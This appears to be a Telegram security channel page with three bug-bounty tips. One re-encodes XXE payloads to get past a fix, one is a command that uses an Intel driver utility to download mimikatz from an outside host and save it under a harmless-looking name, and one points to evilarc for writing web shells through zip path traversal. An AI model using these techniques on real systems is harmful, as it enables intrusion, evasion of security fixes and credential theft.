Information Security
408 subscribers
157 photos
5 videos
9 files
2.28K links
Information Security News

we are @sec_nerd twin brother
Download Telegram
Bypass Fix of OB XXE Using Different encoding and get 2x bounty
😁


1. Encode Payload to UTF-7
2. Encode Payload to UTF-16
3. Encode Payload to UTF-16BE

- Try with other encodings as well, if accepted by the XML parser.
file downloader (Intel Graphics Driver for Windows 10)

GfxDownloadWrapper.exe "http://10.10.10.10/mimikatz.exe" "C:\Temp\harmless.exe"
evilarc lets you create a zip file that contains files with directory traversal characters in their embedded path.

Example use: arbitrary file writing your web shell to the doc root on a vuln file upload function

https://github.com/ptoomey3/evilarc

#BugBounty